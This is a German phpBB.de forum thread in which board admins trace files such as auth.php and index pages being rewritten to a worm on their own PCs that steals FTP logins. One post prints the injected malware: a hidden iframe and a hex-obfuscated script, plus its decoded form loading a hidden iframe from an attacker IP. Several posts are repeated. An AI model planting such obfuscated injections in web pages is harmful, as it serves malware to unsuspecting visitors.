Verfasst: 29.04.2007 14:23
Da war mein Tipp mit dem "lokalen" Virus doch nicht so abwägig 
phpBB.de
phpBB.de - Die deutsche phpBB-Community
https://www.phpbb.de/community/
auth.php ändert sich von selbst
Seite 3 von 3
Verfasst: 29.04.2007 15:29
Deshalb bist Du ja auch der "DOC"!
Verfasst: 30.04.2007 10:25
So, hab dann mal die Dateien nach dem der Virus/Worm entfernt war nochmal hochgeladen. Leider tratt der Fehler wieder auf. Jetzt lad ich gerade mal ein neues runter und versuch mal es neuzuinstallieren (davor den Webspace ganz leeren). In der Zwischenzeit habe ich festgestellt, dass es nicht nur die auth.php sondern auch sämtliche index.php und index.htm in allen Verzeichnissen betrifft, die immer da sind (heißt: nicht in den lang_xyz und templates/xyz ).
Sollte dieser Versuch (mit löschen und neuinstallieren) nicht klappen, werde ich nochmal meinen Hoster kontaktieren und ihn bitten den Webspace mal auf Viren untersuchen zulassen.
Sollte dieser Versuch (mit löschen und neuinstallieren) nicht klappen, werde ich nochmal meinen Hoster kontaktieren und ihn bitten den Webspace mal auf Viren untersuchen zulassen.
Verfasst: 30.04.2007 10:28
hm...vielleicht solltest Du auch Deinen PC mal säubern.... restagen ... neu formatieren .... Root_kit entfernen usw... ?
Verfasst: 30.04.2007 10:30
Hm hatte ich in der ersten Version meines Beitrags drinstehen aber irgendwie wieder rausgenohmen udn nicht mehr reingeschrieben...
Hab gestern noch mein Rechner Neuinstalliert (mit 3mal Festplatte formatieren)
Hab gestern noch mein Rechner Neuinstalliert (mit 3mal Festplatte formatieren)
Verfasst: 01.05.2007 01:03
Ok, ich mach an dieser Stelle nochmal ein Doppelpost.
Nach einer längeren Testphase hat sich nun herrausgestellt, dass ein erneuter Passwort wechsel in der Wurmfreien Umgebung genau das richtige war xD
Das Problem ist nun also behoben. (Der Passwort wechsel vor der Neuinstallation hat natürlich nicht funktioniert, da der Wurm dem Hacker einfach die neuen Zugangsdaten geschickt hatte =( )
Nach einer längeren Testphase hat sich nun herrausgestellt, dass ein erneuter Passwort wechsel in der Wurmfreien Umgebung genau das richtige war xD
Das Problem ist nun also behoben. (Der Passwort wechsel vor der Neuinstallation hat natürlich nicht funktioniert, da der Wurm dem Hacker einfach die neuen Zugangsdaten geschickt hatte =( )
Verfasst: 25.05.2007 22:44
Ich habegerade diesen trage gesehen und muss dir sagen
das der Fame einen irus weiter leitet.
ich selber war davon betroffen und egalwie offt man diesen frame entfernt,
er kommt immer wieder.
Alle Index.php/htm/html sind davon betroffen.
um das hin zu bekmmen, laufen angriffe über ssh2 über eienen
sever mit der IP 217.72.130.81.
Schaut mal in den FTP logfiles
der Server gehört NetGate und hatte schon das vergnügen mit denen.
Sind sehr kompetent gewesen und der Support, hatte dies geschrieben.
Netgate Support
Sehr geehrter Herr XXX,
Danke für die Informationen. Wir haben den Rechner gleich nach unserem Gespräch
untersucht und Hinweise für illegales Verhalten gefunden. Die Maschine wurde
gesperrt.
Ich rate, wenn einen eigenen server besteht, allesneu auf zu spielen
oder deine Orignal Dateien von anfang zu verwenden.
Wenn der virus drauf ist, sucht er deine FTP zugangsdaten von fileZillar
oder ähnlichen FTP Prorammen.
oder nimmt diese vom server selber wenn der angriff gelingt.
Nach der sperrung, habe ich schon wenigstens ruhe und habe selber die Ip gesperrt.
Viel erfolg und hoffe ihr hab immoment auch ruhe.
valkox
das der Fame einen irus weiter leitet.
ich selber war davon betroffen und egalwie offt man diesen frame entfernt,
er kommt immer wieder.
Alle Index.php/htm/html sind davon betroffen.
um das hin zu bekmmen, laufen angriffe über ssh2 über eienen
sever mit der IP 217.72.130.81.
Schaut mal in den FTP logfiles
der Server gehört NetGate und hatte schon das vergnügen mit denen.
Sind sehr kompetent gewesen und der Support, hatte dies geschrieben.
Netgate Support
Sehr geehrter Herr XXX,
Danke für die Informationen. Wir haben den Rechner gleich nach unserem Gespräch
untersucht und Hinweise für illegales Verhalten gefunden. Die Maschine wurde
gesperrt.
Ich rate, wenn einen eigenen server besteht, allesneu auf zu spielen
oder deine Orignal Dateien von anfang zu verwenden.
Wenn der virus drauf ist, sucht er deine FTP zugangsdaten von fileZillar
oder ähnlichen FTP Prorammen.
oder nimmt diese vom server selber wenn der angriff gelingt.
Nach der sperrung, habe ich schon wenigstens ruhe und habe selber die Ip gesperrt.
Viel erfolg und hoffe ihr hab immoment auch ruhe.
valkox
Verfasst: 25.01.2008 08:41
Hallo,
die gleiche (oder ähnliche) Seuche hat mich auch befallen.
Hier mein Erfahrungsbericht:
Ich bin gerade das erste mal dabei ein Board einzurichten. Und während ich so unter der "produktiven" Domain am einrichten bin kam plötzlich der Schock
Wie mir zunächst unschwer aufgefallen ist wurden die Dateien
login.php, admin/index.php und includes/auth.php gelöscht.
Jetzt ein bisschen gegooglet:
Tip1: Dateien wieder hochladen
Ergebnis: Nachdem die Dateien wieder hochgeladen wurden, wurden Sie kurze Zeit später wieder gelöscht !
Weiter gegooglet:
Tip2: Sichertsmaßnahmen
Ich habe dann sofort alle Sichertsmaßnahmen aus der Anleitung eingebaut, einschl register_globals=off.
Ergebnis: Schade, wieder nix, aber etwas anderes Verhalten. Die login.php, admin/index.php waren nach 2h wieder weg, aber die auth.php war noch da, hatte aber irgendwie einen neuen Zeitstempel bekommen.
Also die auth.php mit der originalen Datei verglichen und festgestellt: Scheiße, wer oder was hat den diesen komische Code hier angehängt?
Weiter gegooglet:
Tip3: Virus auf dem lokalen PC (aus diesem Thread hier)
Jetzt gings schnell, FTP-Logfile untersucht und jau dat gibbet doch nicht!
Von meinem PC aus wurden sämtliche Index.php/htm/html aus allen Verzeichnissen schön nacheinander runtergeladen, modifiziert und dann wieder hochgeladen.
Ich hatte selber auch schonmal kurz an sowas gedacht, aber habe das dann gedanklich völlig ignoriert. Virus auf meinem PC? Nö dat kann doch nicht sein, da hat doch bestimmt die phpBB2 Software ne' Lücke, oder der Provider macht da Blödsinn!
Jetzt weiter forschen, also aus dem Logfile die böse IP (77.221.133.186) rausgesucht und in Google reingesteckt, und siehe da:
Auf http://sugree.com/node/8 hat jemand den eingeschleusten Code in Klartext umgewandelt:
Was auch immer das bedeutet, hört sich auf jedenfall nicht gut an!
Die befallenen Dateien habe ich restauriert. Der Windows PC ist jetzt vom Netz. Das FTP Passwort habe ich von einem anderen Rechner aus (Ubuntu) geändert und muß am Wochenende mal untersuchen welcher Trojaner sich da eingeschlichen hat und was der so alles anstellt.
Für mich bleiben einige Fragen:
- Was bewirkt der eingeschleuste Code?
- Wer macht so was?
- Welchen Sinn macht das ganze überhaupt?
Was ich bis jetzt daraus gelernt habe:
1. Webspace- und Boardadministration nur noch von einem Linux Rechner vornehmen
2. Erstmal den Fehler bei dem eigenen System ausschliessen bevor man andere verdächtigt
3. Suchfunktion bei phpbb.de nutzen
Puuhhhh, also auf jedenfall mal ein dickes Dankeschön für dieses Forum. Hier scheint es wirklich für jedes Problem zumindest einen Hinweis zu geben.
Schönen Tach noch
lrangar
die gleiche (oder ähnliche) Seuche hat mich auch befallen.
Hier mein Erfahrungsbericht:
Ich bin gerade das erste mal dabei ein Board einzurichten. Und während ich so unter der "produktiven" Domain am einrichten bin kam plötzlich der Schock
Wie mir zunächst unschwer aufgefallen ist wurden die Dateien
login.php, admin/index.php und includes/auth.php gelöscht.
Jetzt ein bisschen gegooglet:
Tip1: Dateien wieder hochladen
Ergebnis: Nachdem die Dateien wieder hochgeladen wurden, wurden Sie kurze Zeit später wieder gelöscht !
Weiter gegooglet:
Tip2: Sichertsmaßnahmen
Ich habe dann sofort alle Sichertsmaßnahmen aus der Anleitung eingebaut, einschl register_globals=off.
Ergebnis: Schade, wieder nix, aber etwas anderes Verhalten. Die login.php, admin/index.php waren nach 2h wieder weg, aber die auth.php war noch da, hatte aber irgendwie einen neuen Zeitstempel bekommen.
Also die auth.php mit der originalen Datei verglichen und festgestellt: Scheiße, wer oder was hat den diesen komische Code hier angehängt?
Code: Alles auswählen
<body bgcolor="#FFFFFF" text="#000000">
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>
function v4798d3558079d(v4798d35580b97){ return(parseInt(v4798d35580b97,16));}
function v4798d355817a4(v4798d35581b9c){ var v4798d35581f9c='';for(v4798d355823ec=0; v4798d355823ec<v4798d35581b9c.length; v4798d355823ec+=2){ v4798d35581f9c+=(String.fromCharCode(v4798d3558079d(v4798d35581b9c.substr(v4798d355823ec, 2))));}return v4798d35581f9c;}
document.write(v4798d355817a4('3C5343524950543E77696E646F772E7374617475733D274
46F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D63646
638653165383564207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E
69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D2829
2A323738313533292B273263666336653264655C272077696474683D3739372068656967687
43D333439207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D
653E27293C2F5343524950543E'));
</script>Tip3: Virus auf dem lokalen PC (aus diesem Thread hier)
Jetzt gings schnell, FTP-Logfile untersucht und jau dat gibbet doch nicht!
Von meinem PC aus wurden sämtliche Index.php/htm/html aus allen Verzeichnissen schön nacheinander runtergeladen, modifiziert und dann wieder hochgeladen.
Ich hatte selber auch schonmal kurz an sowas gedacht, aber habe das dann gedanklich völlig ignoriert. Virus auf meinem PC? Nö dat kann doch nicht sein, da hat doch bestimmt die phpBB2 Software ne' Lücke, oder der Provider macht da Blödsinn!
Jetzt weiter forschen, also aus dem Logfile die böse IP (77.221.133.186) rausgesucht und in Google reingesteckt, und siehe da:
Auf http://sugree.com/node/8 hat jemand den eingeschleusten Code in Klartext umgewandelt:
Code: Alles auswählen
window.status='Done';
document.write('<iframe name=ea8b src=\'http://77.221.133.188/.if/go.html?'+Math.round(Math.random()*35712)+'455ded43d\' width=72 height=496 style=\'display: none\'></iframe>')Die befallenen Dateien habe ich restauriert. Der Windows PC ist jetzt vom Netz. Das FTP Passwort habe ich von einem anderen Rechner aus (Ubuntu) geändert und muß am Wochenende mal untersuchen welcher Trojaner sich da eingeschlichen hat und was der so alles anstellt.
Für mich bleiben einige Fragen:
- Was bewirkt der eingeschleuste Code?
- Wer macht so was?
- Welchen Sinn macht das ganze überhaupt?
Was ich bis jetzt daraus gelernt habe:
1. Webspace- und Boardadministration nur noch von einem Linux Rechner vornehmen
2. Erstmal den Fehler bei dem eigenen System ausschliessen bevor man andere verdächtigt
3. Suchfunktion bei phpbb.de nutzen
Puuhhhh, also auf jedenfall mal ein dickes Dankeschön für dieses Forum. Hier scheint es wirklich für jedes Problem zumindest einen Hinweis zu geben.
Schönen Tach noch
lrangar